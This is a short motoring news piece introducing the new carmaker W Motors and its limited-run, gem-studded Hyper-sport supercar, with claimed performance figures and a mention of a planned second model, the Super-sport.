Never heard of W Motors? Understandable. It’s a brand new company, based for now in Lebanon but due to relocate to a new HQ in the UAE at the end of this year. The aim of W Motors, as outlined by chairman Ralph Debbas, is to produce the world’s most luxurious sports car in the world. And the Hyper-sport, complete with diamond-encrusted LED lights and a choice of precious gems inside, is set to be it.
The car has been designed in collaboration with German Porsche tuner RUF and Italian engineering firm Magna Steyr, and just five will be built. Power comes from a mid-mounted twin-turbo flat six producing 750hp, giving the Hyper-sport a claimed 0-1ookph time of just 2.8 seconds, and a top speed of 385kph. The body is handmade in Italy from carbonfibre, while the interior is available with control buttons made from gold and platinum. W Motors promises the world’s first holographic display inside, projecting a 9-inch display into the air to control the various multimedia systems. The engine cover is made from engraved gold, while crystal fragments in the paint promise to give the car an extra-expensive shine.
All of which likely means that the Hyper-sport will be face-chewingly costly. We’ve long ago learned not to get our hopes up about new small supercar manufacturers, as the successes are vastly outweighed by the failures. But the backing of firms like RUF and Magna Steyr give W Motors some serious know-how, and if ever there was a market for monstrously expensive ubercars, it’s the Middle East. A second car, called the Super-sport, will focus on driving performance rather than outrageous luxury, and is scheduled for unveiling at the Qatar Motor Show next year.
